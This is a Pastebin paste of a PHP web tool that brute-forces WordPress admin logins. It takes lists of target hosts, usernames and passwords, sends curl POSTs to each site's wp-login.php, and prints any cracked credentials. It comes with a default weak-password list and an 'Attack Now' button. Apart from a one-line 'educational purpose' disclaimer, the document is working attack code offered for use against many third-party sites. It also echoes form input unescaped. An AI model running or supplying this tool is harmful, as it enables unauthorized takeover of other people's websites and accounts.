87aCk_X

WordPress Admin Panel Brute Force Attacks

Sep 29th, 2013
749
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. echo "
  3. <!--
  4. WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing
  5. Powered By Dr.FarFar
  6. PS: This Tool is For Penetration Testing And Educational Purpose, Dr.FarFar Is Not Responsible At Any Bad Using For This Tool.
  7.  
  8. This program is free software: you can redistribute it and/or modify
  9. it under the terms of the GNU General Public License as published by
  10. the Free Software Foundation, either version 3 of the License, or
  11. (at your option) any later version.
  12. -->
  13. ";
  14.  
  15. error_reporting(0);
  16. set_time_limit(0);
  17. ignore_user_abort(true);
  18. ?>
  19. <html>
  20. <head>
  21. <title> | </title>
  22.  
  23. <HEAD>
  24.  
  25. <SCRIPT LANGUAGE="JavaScript">
  26.  
  27. <!-- Begin
  28. var message = new Array();
  29. // Set your messages below -- follow the pattern.
  30. // To add more messages, just add more elements to the array.
  31. message[0] = "WordPress Admin Panel Brute Force Attacks";
  32. message[1] = "Powered By Dr.FarFar";
  33. message[2] = "Egyptian Shell Team Penetration Testing";
  34. message[3] = "Egyptian Shell Team";
  35. message[4] = "Powered By Dr.FarFar";
  36. message[5] = "Egyptian Shell Team Penetration Testing";
  37. message[6] = "Powered By Dr.FarFar";
  38.  
  39. // Set the number of repetitions (how many times the arrow
  40. // cycle repeats with each message).
  41. var reps = 2;
  42. var speed = 200;  // Set the overall speed (larger number = slower action).
  43.  
  44. // DO NOT EDIT BELOW THIS LINE.
  45. var p = message.length;
  46. var T = "";
  47. var C = 0;
  48. var mC = 0;
  49. var s = 0;
  50. var sT = null;
  51. if (reps < 1) reps = 1;
  52. function doTheThing() {
  53. T = message[mC];
  54. A();
  55. }
  56. function A() {
  57. s++;
  58. if (s > 8) { s = 1;}
  59. // you can fiddle with the patterns here...
  60. if (s == 1) { document.title = '||||||====||[ '+T+' ]||====||||||'; }
  61. if (s == 2) { document.title = '|||=|||===||[ '+T+' ]||===|||=|||'; }
  62. if (s == 3) { document.title = '|||==|||==||[ '+T+' ]||==|||==|||'; }
  63. if (s == 4) { document.title = '|||===|||=||[ '+T+' ]||=|||===|||'; }
  64. if (s == 5) { document.title = '|||====|||||[ '+T+' ]|||||====|||'; }
  65. if (s == 6) { document.title = '|||===|||=||[ '+T+' ]||=|||===|||'; }
  66. if (s == 7) { document.title = '|||==|||==||[ '+T+' ]||==|||==|||'; }
  67. if (s == 8) { document.title = '|||=|||===||[ '+T+' ]||===|||=|||'; }
  68. if (C < (8 * reps)) {
  69. sT = setTimeout("A()", speed);
  70. C++;
  71. }
  72. else {
  73. C = 0;
  74. s = 0;
  75. mC++;
  76. if(mC > p - 1) mC = 0;
  77. sT = null;
  78. doTheThing();
  79.    }
  80. }
  81. doTheThing();
  82. //  End -->
  83. </script>
  84.  
  85. <meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>
  86.  
  87. <style type="text/css">
  88. body {
  89.         color: white;
  90.         background-image: url(http://i283.photobucket.com/albums/kk281/fjachel/Black-background.gif);
  91. }
  92. textarea {
  93.         border-radius: 8px;
  94.         color: white;
  95.         background-color:black;
  96. }
  97. input[type=submit] , .submit{
  98.                 background-color:black;
  99.                 color:white;
  100.                 border-radius:8px;
  101. }
  102. p {
  103.         font-size: 10px;
  104.         text-align: center;
  105. }
  106. a:link,a:hover,a:visited {
  107.         color:pink;
  108. }
  109. </style>
  110. </head>
  111. <!-- Dr.FarFar | WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing -->
  112. <center>
  113. <p><a href="http://9eg.blogspot.com" target="_blank"><img
  114.  
  115. src="http://im37.gulfup.com/VLNdW.png"
  116.  
  117. border="0"/></a></p>
  118. <form enctype="multipart/form-data" method="POST">
  119.   <table width='624' border='0' id='Box'>
  120.     <tr>
  121. <td width='4%'>&nbsp;</td>
  122. <p><span style="color:#FFFF00;"><span style="font-size:28px;"><strong>WordPress Admin Panel</strong> <strong style="margin: 0px; padding: 0px; border: 0px; font-style: inherit; line-height: inherit; font-family: inherit;">Brute Force Attacks</strong></span></span></p>
  123.     <tr>
  124.       <td >&nbsp;</td>
  125.       <td ><b><p>Hosts:</p></b></td>
  126.       <td ><b><p> Users:</p></b></td>
  127.       <td ><b><p>Passwords:</p></b></td>
  128.     </tr>
  129.     <tr>
  130.       <td>&nbsp;</td>
  131.       <td ><textarea name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
  132.       <td ><textarea name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST['usernames'];}else {echo
  133.  
  134. "admin\nadministrator";} ?></textarea></td>
  135.       <td ><textarea name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
  136.     </tr>
  137. <tr><td colspan="4"><input type="submit" name="submit" value="[ Attack Now ]"  />
  138. <?php
  139. if($_POST)
  140. {
  141.         $hosts = trim(filter($_POST['hosts']));
  142.         $passwords = trim(filter($_POST['passwords']));
  143.         $usernames = trim(filter($_POST['usernames']));
  144.  
  145.         if($passwords && $usernames && $hosts)
  146.         {
  147.                 $hosts_explode = explode("\n", $hosts);
  148.                 $usernames_explode = explode("\n", $usernames);
  149.         $passwords_explode = explode("\n", $passwords);
  150.  
  151.                 foreach($hosts_explode as $host)
  152.                 {
  153.                         $host = RemoveLastSlash($host);
  154.                         $hacked = 0;
  155.                         $host = str_replace(array("http://","https://","www."),"",trim($host));
  156.                         $host = "http://".$host;
  157.                         $wpAdmin = $host.'/wp-admin/';
  158.  
  159.                         if(!url_exists($host."/wp-login.php"))
  160.                         {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush
  161.  
  162. ();continue;}
  163.  
  164.                         foreach($usernames_explode as $username)
  165.                         {
  166.                                 foreach($passwords_explode as $password)
  167.                                 {
  168.                                         $ch   =     curl_init();
  169.                                         curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  170.                                         curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
  171.                                         curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
  172.                                         curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
  173.                                         curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  174.                                         curl_setopt($ch,CURLOPT_POST,TRUE);
  175.                                         curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".
  176.  
  177. $password."&wp-submit=Giri?"."&redirect_to=".$wpAdmin."&testcookie=1");
  178.                                         $login    =        curl_exec($ch);
  179.  
  180.                                         if(eregi ("profile.php",$login) )
  181.                                         {
  182.                                                 $hacked = 1;
  183.                                                 echo "<p>".$host." => UserName : [<font color='green'>".
  184.  
  185. $username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
  186.                                                 ob_flush();flush();break;
  187.                                         }
  188.                                 }
  189.                                 if($hacked == 1){break;}
  190.                         }
  191.                         if($hacked == 0)
  192.                         {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
  193.                 }
  194.         }
  195.         else {echo "<p><b><font color='red'>All fields are Required ! </font></b></p>";}
  196. }
  197. ?>
  198. </td></tr>
  199. </table></form>
  200.  
  201. <!-- Dr.FarFar | WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing -->
  202. <p><strong>Powered By <a href="http://9eg.blogspot.com">Dr.FarFar</a></strong></p>
  203.  
  204. </center>
  205. <p>
  206.   <?php
  207. function url_exists($strURL)
  208. {
  209.     $resURL = curl_init();
  210.     curl_setopt($resURL, CURLOPT_URL, $strURL);
  211.     curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
  212.     curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
  213.     curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
  214.     curl_exec ($resURL);
  215.     $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
  216.     curl_close ($resURL);
  217.     if ($intReturnCode != 200){return false;}
  218.         else{return true ;}
  219. }
  220. function filter($string)
  221. {
  222.         if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
  223.         else{return $string;    }
  224. }
  225. function RemoveLastSlash($host)
  226. {
  227.         if(strrpos($host, '/', -1) == strlen($host)-1)
  228.         {return substr($host,0,strrpos($host, '/', -1));}
  229.         else{return $host;}
  230. }
  231. ?>
  232. <?php  echo "</p>"; ?>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×